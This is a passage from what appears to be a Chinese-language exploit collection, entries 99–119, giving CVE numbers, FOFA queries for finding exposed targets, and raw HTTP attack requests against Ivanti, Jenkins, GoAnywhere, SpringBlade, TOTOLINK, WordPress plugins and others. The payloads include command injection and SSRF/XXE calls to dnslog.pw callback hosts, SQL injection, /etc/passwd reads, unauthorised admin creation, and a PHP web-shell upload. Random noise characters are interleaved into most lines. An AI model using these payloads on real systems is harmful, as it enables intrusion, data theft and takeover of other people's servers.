: S) c$ p M% Q( X+ h$ a% a- B A a
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
* F7 C, D# J$ K# c- a3 E) k A' F! n6 E7 \5 n
% o q7 z( q4 g/ B n# d# ~" G
99. Ncast盈可视高清智能录播系统busiFacade RCE" J4 t9 d5 d% a( ]3 |* p/ M" B% N
CVE-2024-0305/ o- j: g4 K# P) f& G
FOFA:app="Ncast-产品" && title=="高清智能录播系统"8 k8 N% U# g6 p
POST /classes/common/busiFacade.php HTTP/1.1+ J4 l& N6 i9 R; J
Host: 192.168.40.130:8080
4 W: D5 V/ ^' GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
# Y; Z. i8 n/ k8 L8 {: `* zConnection: close2 d7 q7 G' n3 N, ?
Content-Length: 1545 R+ W+ l0 R" A/ t# t0 O# A
Accept: */*
# M3 D3 M/ z5 e: n4 o/ LAccept-Encoding: gzip, deflate
& t2 F. E( U" \' f( @! X9 r Y. JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' `9 q3 }/ ^; E# U# o
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
3 I1 h6 Z; S" LX-Requested-With: XMLHttpRequest& ~+ r: H* t" E' T* U/ ]5 }, ?
$ b$ _/ V- m: h0 N/ [$ m# r' A
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
) m0 M, O: X+ g ~- \
; ?- C6 o9 x/ c3 }, L
2 G- C; I+ q7 ^+ u/ D100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传% k$ ~9 M$ a, g; c
CVE-2024-0352& O) a2 D5 V& L/ \( l; P( X3 D$ U" b
FOFA:icon_hash="874152924"
9 a* N- A7 O7 c9 R+ Q4 A; ]7 [POST /api/file/formimage HTTP/1.12 x! h$ F2 j) h5 \( U( ~! b
Host: 192.168.40.130
; I% K8 |- x# o: G6 eUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.369 n5 c; \1 n3 `; L9 [9 w- Z
Connection: close
! y! U( o9 M9 c; [9 o0 |Content-Length: 201
3 E+ s9 g9 }, j' n/ qContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
% v3 z- W$ Q1 k. l; Q# aAccept-Encoding: gzip
# V" }: g3 p" q0 r' H2 w0 M1 [2 a; v$ U1 H
------WebKitFormBoundarygcflwtei
- M1 e/ V3 \; r; B# G: r5 [Content-Disposition: form-data; name="file";filename="IE4MGP.php"
4 s9 E( l* Q$ G$ m. g1 @' Q0 eContent-Type: application/x-php& c" r2 K L: O. M% Q2 v
# u* r6 k: ~$ x/ X J( A
2ayyhRXiAsKXL8olvF5s4qqyI2O, n0 x7 `$ f8 R0 m- u, A) w% x0 \
------WebKitFormBoundarygcflwtei--/ `+ V; z; V M" F; r- J5 l
3 P6 v e) y" R5 U- U2 a) U' x' L& Z. w2 s& H$ q, g- {
101. ivanti policy secure-22.6命令注入
, ?, B$ t2 J& I6 NCVE-2024-21887
3 U o; F4 l2 SFOFA:body="welcome.cgi?p=logo"! L4 R3 [' n4 w
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1' C0 u! e/ d% a+ b( @
Host: x.x.x.xx.x.x.x' c! f8 f+ T6 q" F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
$ W- Y, q0 ?6 T: zConnection: close5 L2 M1 q2 C2 y
Accept-Encoding: gzip
3 J& \3 K8 u# l- T y( q: o# z7 y; ]. N# X6 i, v0 `6 R2 u% P
3 \0 Y: Z( u, H6 E3 _6 y! z! x102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行* T8 S& R7 Y9 P! Z9 A. B
CVE-2024-21893
9 Q7 Z7 l" v: B2 M3 W n, r; O4 h) |3 l3 P! xFOFA:body="welcome.cgi?p=logo"9 @# R* o4 q+ I6 b; A
POST /dana-ws/saml20.ws HTTP/1.1! L* B* l0 E5 t$ X$ H' ?. x# R
Host: x.x.x.x
2 [; }$ W2 v" C+ m9 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.365 _6 T# S/ L/ f+ M
Connection: close
9 {- L) r1 Q$ A$ ~6 e9 I" CContent-Length: 792
4 L7 ^3 ]1 D0 G$ F# E5 V3 _2 bAccept-Encoding: gzip$ {; g4 ^# \! t9 U1 A
/ C8 [7 b* Q' x. N6 S
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>5 U. n" m( L/ v S9 `! t8 `9 ]6 s4 I
4 ^) }, j j& L: B% [ v
103. Ivanti Pulse Connect Secure VPN XXE
# T/ J E+ T( C6 _$ ]" _CVE-2024-22024
; Z' l- t- d0 j5 E' |7 V! R) f0 q% `FOFA:body="welcome.cgi?p=logo"6 P% H4 H* f1 E
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
# ~) T T3 K9 u; tHost: 192.168.40.130:111; D0 M$ j6 Y% [- ~5 g
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36: K7 X, w4 @$ ? A6 E0 z. y' ^
Connection: close" _" d8 U( A8 a9 W; P: \
Content-Length: 204
: z @2 K$ h7 R* T% {3 J% a- P1 o! WContent-Type: application/x-www-form-urlencoded" k* h+ c, g, D. R+ W2 c' s6 I$ t
Accept-Encoding: gzip4 C l, [- O/ C1 u1 z
! ?* R$ e- ?" |0 n$ \( \, M; p
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==* N7 f# {$ t3 \7 h5 d$ v
) _0 ]9 u+ U U/ ]0 y7 v3 U% m/ @% H% J# c
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下6 b5 I2 n8 x9 G0 z
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r> _, }. L* E5 H' Q' T
8 @3 e6 j2 L( { g& h! Q, C
3 E2 t9 m4 g0 P% \9 p3 L104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露# o& [9 d$ U" h6 I$ J' H( p
CVE-2024-0569) }0 E& E- }/ P" U( \8 E
FOFA:title="TOTOLINK"( O: M" c8 J2 u$ _
POST /cgi-bin/cstecgi.cgi HTTP/1.1
9 U d4 _* x+ }0 ~/ RHost:192.168.0.1/ c" w: Z) T: c" l
Content-Length:41
1 ~( `5 N+ H( r% TAccept:application/json,text/javascript,*/*;q=0.01- z% P) u" z# o
X-Requested-with: XMLHttpRequest/ v V/ T- ~$ N) k8 E, f
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36" y3 V, [" Y' I
Content-Type: application/x-www-form-urlencoded:charset=UTF-8" W, R& K6 Y0 G
Origin: http://192.168.0.1. B$ L4 F5 F6 `* \4 P
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
8 R2 h- S, P" D' B8 Q+ R% ~Accept-Encoding:gzip,deflate
" ^9 ?9 U3 P2 F7 |- f* B$ rAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7) M! u& I0 S$ C" z8 ?7 [- \
Connection:close
8 n$ D% q2 J# b9 S# {1 i8 d6 n( w3 m! q" _2 w. T6 m8 @
{
, c9 \7 s( X3 u, a; y"topicurl":"getSysStatusCfg",
$ e( t4 e. k1 k1 l, o2 ]"token":""7 ~% k2 ?# f; o& J+ H
}9 B# e' J" M U- y7 E
/ x' |4 G9 ^; r7 i s: G+ f% P3 U105. SpringBlade v3.2.0 export-user SQL 注入/ M+ N9 z/ K) u+ g/ Z
FOFA:body="https://bladex.vip"
1 z6 u5 x/ l1 ?. ]* {http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1: a9 w9 n* t6 t& k
5 M: h& K/ O! |2 ]4 y106. SpringBlade dict-biz/list SQL 注入2 h/ m6 N ?4 \% B4 }& K: H- d, i0 R
FOFA:body="Saber 将不能正常工作"
5 A5 ] Y" Y" M, \. k' n e! XGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
9 H6 H7 M% c$ [$ X* ~6 PHost: your-ip
; ]0 q9 a' q6 k1 Q6 d% YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 G F! a+ c# @' ^$ CBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A1 y4 {# B( {3 k: L0 R2 I" R
Accept-Encoding: gzip, deflate
9 Z0 u3 _! C2 |5 Q2 c. W( W7 fAccept-Language: zh-CN,zh;q=0.9
8 S0 D7 I. g* m: S, }, R1 c. ?2 oConnection: close
; |; }' A7 u$ S# L( Z
% x# }2 n& G9 T4 x- U7 j3 e2 x# n
! t2 X: V+ h/ }107. SpringBlade tenant/list SQL 注入
: G( l0 \: ]- ?6 q7 Q( D- b6 MFOFA:body="https://bladex.vip"
8 U# i9 @ `' W! W, X& v0 DGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1! ?( i' c3 [* o( w) X
Host: your-ip
. q2 E5 E& i7 f" L3 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 q l1 }; C( H$ k7 MBlade-Auth:替换为自己的
+ V' z. ]2 Q& l2 T' O6 m, T$ UConnection: close
# a4 e% Y6 v7 @' i9 k& Z x) q/ H! M" ?$ @2 U2 \+ Q
" f4 \3 D/ @3 ]+ l9 V" |" k/ ?
108. D-Tale 3.9.0 SSRF9 {" D5 L: F2 F8 e) v
CVE-2024-21642( u. T" \5 E& n& n% C- B
FOFA:"dtale/static/images/favicon.png"& k$ s8 V9 @8 R9 C& M1 l8 j4 E \
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
6 \5 r+ k- ]# m+ L6 LHost: your-ip* X; Y+ R- W( }# i: ~% h* n- s
Accept: application/json, text/plain, */*
9 Z8 m, r4 ^, Q# `; e6 [" o% T0 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36* Q' _9 H8 G9 v4 e8 O" I8 V3 |7 B
Accept-Encoding: gzip, deflate. [$ {, }6 ]* z+ K
Accept-Language: zh-CN,zh;q=0.9,en;q=0.82 x+ y9 j% G6 c" S9 ?+ F* K
Connection: close& v" p M( X* d( n( l6 m6 f4 ]2 V
: C" u/ R; Q9 \: q' M* d* h8 j( j* v. A8 T% N8 i
109. Jenkins CLI 任意文件读取
/ P% I6 b6 ?0 h, lCVE-2024-238970 O# V. D0 G/ w: A* d
FOFA:header="X-Jenkins"
7 V7 ?8 z5 l I; ^POST /cli?remoting=false HTTP/1.1
, R, q; z1 b+ q- c; F8 lHost:
# w5 v- F; }4 TContent-type: application/octet-stream" d% x3 d. _2 V* `( r0 r7 p
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
8 @9 }, {1 M( d( B3 }2 _0 BSide: upload
# f( H7 X: X. H( P; RConnection: keep-alive
; k0 }& V5 t3 E. S0 hContent-Length: 163+ v5 {" e7 ^) G$ `( q
7 A( u: o: U* ib'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'+ w7 R+ H. h: m. I8 P% l
" b/ _+ E- H1 Y/ d3 q) R9 I4 _+ [+ u/ ^6 u9 V+ l
POST /cli?remoting=false HTTP/1.1
7 `2 H3 n: k" b/ r5 x* J; MHost:
& P# P! ~/ f+ z% C9 f- N6 ?6 mSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e929 S. \7 E( A% x* T6 F- V
download
- X, T* @ D) \3 qContent-Type: application/x-www-form-urlencoded
5 E1 p5 c/ V$ J( _7 U0 k aContent-Length: 0
) x1 T9 M/ _. C1 u, y% r
& s7 O `8 A! B4 P- }& V# Y" c+ a( V, s0 r
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin3 _1 A! I k2 E
java -jar jenkins-cli.jar help! e# o8 ~: X$ u" \" _
[COMMAND]" ^/ V: K$ g+ [4 x# v
Lists all the available commands or a detailed description of single command.
h, x: J4 Q3 \5 D0 k COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)! q# L8 W R& o3 \# M- r" Y+ N5 |
; Y( R' S0 b3 Y) n' X5 P+ w
7 ?" M& K3 j5 v. \! ~110. Goanywhere MFT 未授权创建管理员2 I4 z! @2 T$ M Y1 _' J' y
CVE-2024-0204
% }% W( y+ f* a0 x3 q3 ~3 IFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"6 E+ a' F* r# G* @0 ~% s: N
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
* E1 B `8 c: [$ eHost: 192.168.40.130:8000* V' T% D( P1 e, { p
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
, F+ R q. w1 H; @# y2 Y# o7 p" P4 X+ zConnection: close
& |: e/ n2 ^* l6 _+ ~; [ JAccept: */*! _( ~2 u6 A, w- ^. q% G
Accept-Language: en
5 n" Q3 I! u) ?& a+ H( D5 J4 ]Accept-Encoding: gzip
) b" `+ Y6 E$ z2 n" J' ^
6 |7 s1 e6 _' }/ D; T+ h$ s8 T/ ^, m5 c
111. WordPress Plugin HTML5 Video Player SQL注入0 r6 \ T. g/ [ W- c2 X3 Y
CVE-2024-1061
4 w5 P2 _6 K, o; @& W" {, @$ @FOFA:"wordpress" && body="html5-video-player"
4 X: T% ]* c# @: u" ]0 `, fGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.10 v/ u {; }8 i) F
Host: 192.168.40.130:112. g2 T9 U/ \4 I$ U4 H9 u* \
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.366 |/ j' s6 c# u7 t- K( f$ F9 a; u
Connection: close, _: O0 F: Z# C
Accept: */*$ M! d" y/ q4 ^! s2 i7 z) C
Accept-Language: en" p+ ]! t' W$ i* d, I" n# u/ w* _
Accept-Encoding: gzip
7 p j/ S" ~5 X4 y8 M* B% [6 e7 q
$ N+ F7 |* O2 g! t$ W+ n112. WordPress Plugin NotificationX SQL 注入4 }/ e: \% o+ ~1 q7 C- r
CVE-2024-1698
1 _, L6 x8 p+ WFOFA:body="/wp-content/plugins/notificationx"
3 T2 t7 E$ k3 w& V' b1 p' F QPOST /wp-json/notificationx/v1/analytics HTTP/1.1# j0 W( y- k& g9 J" ^3 J
Host: {{Hostname}}8 e4 G2 z9 ^& k0 `
Content-Type: application/json
' c7 j8 |( i+ l! |' T# E) x: ?+ H" o* z5 e1 J) J
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
; {+ q3 j* B( b& C+ q2 G
; F' N, @" n. ?, Q' d% K
0 k$ H- H) s6 O# ?3 n8 v, ?113. WordPress Automatic 插件任意文件下载和SSRF
1 u. ~9 k& P, f4 QCVE-2024-27954
# s; t/ n( d/ d; e3 Z! zFOFA:"/wp-content/plugins/wp-automatic"
; c: J2 J9 m2 UGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
6 S( R- _$ q! p, Z+ f5 a" Y; @$ T5 MHost: x.x.x.x
: a; p7 s% g9 ~2 [! YUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
! Q7 G( g( d; @$ N& G8 S: yConnection: close
! V8 u2 G, s+ n _1 q* JAccept: */*% k5 r! b& ~6 p
Accept-Language: en
5 j2 W5 q, Q. g' T: G, VAccept-Encoding: gzip1 w: ~ @. B) p$ L
' B' {$ G# a9 {3 C( P! ~& ?
; a: T6 k; v0 l1 |9 _4 i
114. WordPress MasterStudy LMS插件 SQL注入* d- Z- x) B* Z) i
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
! ^1 e4 M( R! k: S. Y/ ]GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
3 d& N; U9 f3 z( X$ |Host: your-ip; p/ w4 ]1 X! r
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.362 c7 `6 A P |3 z
Accept-Charset: utf-8& f: y* @, B; T0 L; H
Accept-Encoding: gzip, deflate
+ X8 l. b, r+ W4 M/ g) `8 WConnection: close
7 v, O+ e7 G( g* H8 g) z" ^6 V1 V# J; w! C. P
4 I6 m+ a2 P2 l4 \; ?1 ?. y x q- Q
115. WordPress Bricks Builder <= 1.9.6 RCE
: y; w7 P& Q& iCVE-2024-25600$ T5 Z0 w8 A2 u; D
FOFA: body="/wp-content/themes/bricks/", P' y1 U% e& ]/ q
第一步,获取网站的nonce值- Q& v! Z/ d( }
GET / HTTP/1.1; l1 v& r8 q( k, Z! ~
Host: x.x.x.x: N3 E: b) Q$ i% ~0 b0 l8 g
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
5 D+ X( q1 n/ ]+ c4 Z! v7 t, WConnection: close% x" {% C0 I% {8 C6 i: W
Accept-Encoding: gzip( y( B( @* T7 I3 i% [
' O: ]# ]/ o9 U: s9 M3 _$ o6 p
* ?* i& y- {1 g4 m7 G& E6 b第二步替换nonce值,执行命令
3 Z' I! [- d# O$ }( m8 Q* WPOST /wp-json/bricks/v1/render_element HTTP/1.1
y6 W, M+ |9 w# n+ RHost: x.x.x.x8 S. i( t/ J" @5 v* |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36* O- w8 {+ J) e: M! t& r& n8 e
Connection: close
8 k1 Y+ r) Y% c' s" g0 ~Content-Length: 356) {/ T# w: y4 ?# t; x; w( Z( x
Content-Type: application/json
# f+ k4 s) W, a2 JAccept-Encoding: gzip' M" k) o A+ T" @; n; `! X
; A+ f+ K M, r* T, j) ] u: ~9 E
{
' ]; W& c% x5 t# ^, c"postId": "1",! [6 j8 U, r% [$ t1 o- f1 C+ J f$ a
"nonce": "第一步获得的值",
6 c: g: L! L0 Y# N% @0 J/ `) m "element": {
: K% U2 f+ _6 h: e1 V "name": "container",3 i. S( M+ D) s3 d
"settings": {
- K3 i' [6 l2 r. `3 `1 M "hasLoop": "true"," \% Z: k* d5 `% Z/ a! q. N3 Q
"query": {
4 G/ m2 P: k, o! v* C "useQueryEditor": true,. P* [" r) ?9 L( Y
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
O) @9 v$ X" m% ~" i7 U "objectType": "post"
1 @: ?+ r/ c- I- b' W' g/ p2 q" ?% O }
+ [' E; w* X$ o" J }5 J0 b, r* M0 _
}
: T$ y7 S+ D. j2 ~}- N# j# [8 s5 N; v# `
. w) Z; h8 n6 {, Z/ b S$ k
% [$ G5 c# ]4 v' E- R116. wordpress js-support-ticket文件上传
) G$ V( I8 a9 {- k8 J& aFOFA:body="wp-content/plugins/js-support-ticket"
9 T& s e& G& C& A# y0 p9 v. PPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.13 [8 Y; k6 S" p; s. v
Host:
7 ~4 M+ Z" I$ _4 R1 o, R$ rContent-Type: multipart/form-data; boundary=--------767099171% i( m: y+ ]. B- }& l0 K* o$ a, G$ y
User-Agent: Mozilla/5.0, R- f8 @. ^/ s
: o3 R% C$ d( J
----------7670991714 Q, |0 r( T2 M2 {. P
Content-Disposition: form-data; name="action"- O t3 O* \$ C9 c& F
configuration_saveconfiguration* X$ J. M5 [8 o4 P) |. |+ \ N3 T1 N
----------767099171
A+ ] L6 E J' o1 ~Content-Disposition: form-data; name="form_request"
1 [+ j7 O4 `: o4 S: Ajssupportticket7 y) p: e9 Q8 M' j& [8 M3 z; A
----------7670991718 h' c- i, a3 v
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"3 x; y3 [" }8 T0 y% p
Content-Type: image/png& f, ~2 z' l+ u) ^4 Q$ l
----------767099171--
8 }( ]1 f0 C3 G( H0 ^; D7 p1 H* E
( T: E1 S u; {9 j5 @) _/ {117. WordPress LayerSlider插件SQL注入
) a f2 V0 y( Uversion:7.9.11 – 7.10.0
% ~9 N) C# x3 B* Y+ j. SFOFA:body="/wp-content/plugins/LayerSlider/"! [: T' N, {/ t
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
" i8 o2 L9 X+ j M& a- uHost: your-ip2 J8 i/ n3 C; p9 g0 y( m/ B5 o% Y9 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0# f" d* P& t# c- A3 U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" Y/ J( r4 v% G& x, _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' p: F p1 Z4 C+ z; W
Accept-Encoding: gzip, deflate, br
& l/ {3 i$ Z: {- _ C' fConnection: close
7 s1 s$ `4 ~+ Q$ a ?Upgrade-Insecure-Requests: 1' p) z2 N9 U. x: c& g7 {
v$ J" ]% o+ g' [; y
- U$ O+ P2 A/ _' {/ h8 ]4 _$ ]2 t118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
3 b1 H, Y& s6 I4 P6 E$ VCVE-2024-0939
( I) v2 y3 O. W! y0 g" L8 k# cFOFA:title="Smart管理平台"
) [2 G: k, W9 T( |, H4 s0 ^& {POST /Tool/uploadfile.php? HTTP/1.1
) f' C+ y \: y! CHost: 192.168.40.130:8443/ r# d0 l9 i( g L4 |
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
5 ?6 k" Q! v% C2 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
: p" @! j q6 d, C( n2 n$ f0 \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' k0 c) j0 | x& r3 L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; l7 V3 a. C# B/ x, }2 AAccept-Encoding: gzip, deflate
; o" Z) K. {/ M) |) O% u$ o. HContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887) n# A- ~0 j4 k$ ~6 C
Content-Length: 405- q) G1 F) V7 M. ?
Origin: https://192.168.40.130:8443" W( _# ?& B/ b* F* u) T
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
- A* z3 P. v' P# oUpgrade-Insecure-Requests: 1
2 X k! {- C3 T( b4 g! {$ lSec-Fetch-Dest: document- c* ]1 s9 g0 M% N' i6 t
Sec-Fetch-Mode: navigate
- o, p9 @% o: Y: k, ASec-Fetch-Site: same-origin
; u) k" m3 y+ ^# cSec-Fetch-User: ?1: r/ ?% Z& O9 a$ m4 N0 Q- X0 h
Te: trailers
" I, k+ t7 t r) p/ x, VConnection: close
( [% n( B9 y) ^% y' g8 F4 Y; P8 b' e
/ f8 C2 ~. ^8 h# U- u-----------------------------13979701222747646634037182887
$ w$ u4 x9 J1 X% {* J) CContent-Disposition: form-data; name="file_upload"; filename="contents.php"1 h1 K6 U& ~ w1 g3 q
Content-Type: application/octet-stream" h5 U2 ^) {- [, \5 V& f, H. P1 X$ c
9 j% Q6 d6 [/ W$ F
<?php1 J, e" i/ i v$ h: E: T
system($_POST["passwd"]);9 k" K2 }0 Q' s! E1 e1 T
?>
0 f; h# ]0 h, y: m) r7 [9 b; V-----------------------------139797012227476466340371828873 h- y0 `6 R; B4 ~
Content-Disposition: form-data; name="txt_path"* I+ y0 U+ r$ H, B
8 r9 C$ ~9 n: ~" G& M
/home/src.php0 z6 Q* p) R' r
-----------------------------13979701222747646634037182887--
9 n4 c9 a7 |0 @+ `! c8 t. O7 j T7 C
0 e9 L6 P- S/ Q' k, F0 K3 o8 U1 |/ J$ G6 h0 o6 k5 g" z6 K$ R& t
访问/home/src.php
5 F, A5 @& g B; ~- N6 O& W7 _+ u ?7 W5 }/ _! y) l! {
119. 北京百绰智能S20后台sysmanageajax.php sql注入
' f1 d4 b& B `# r& yCVE-2024-1254
) x9 J: I' T( l. @' a) d5 ^# {# LFOFA:title="Smart管理平台"9 `8 F& W. U# f+ P2 w2 ^
先登录进入系统,默认账号密码为admin/admin
0 Z( X' G3 b$ oPOST /sysmanage/sysmanageajax.php HTTP/1.111 ~6 Z! o' ^4 @$ U+ z
Host: x.x.x.x3 K; L" z+ c( K+ Z# p" l
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee6 z( Z# X6 s' y U% w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0- `4 V( _# r5 ]" w& N/ |
Accept: */*
$ U6 j/ L4 g; N- {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. g( r3 `6 p& Y+ ~% VAccept-Encoding: gzip, deflate" `" w& b; {( y8 Q; x3 G
Content-Type: application/x-www-form-urlencoded;- ]! F7 O3 q3 ]9 y
Content-Length: 109
- \7 X5 {7 _; K# M* h6 dOrigin: https://58.18.133.60:8443! a7 {6 S9 `; e0 P0 m" t
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
) D, g# ~: x. ]0 b# T' X/ S0 KSec-Fetch-Dest: empty7 Q5 K: z% o) P; ?( c$ I
Sec-Fetch-Mode: cors
: i% e9 h, d$ v: aSec-Fetch-Site: same-origin
0 z! Q6 m' \, z" X. nX-Forwarded-For: 1.1.1.1
3 E2 U' Q4 }+ a/ N( yX-Originating-Ip: 1.1.1.1
9 M. q) q/ I3 V, T, ]' BX-Remote-Ip: 1.1.1.1
# X6 V r( E1 ?# m! D7 NX-Remote-Addr: 1.1.1.1- y4 d( M- w- T) |0 q! f6 ?7 T
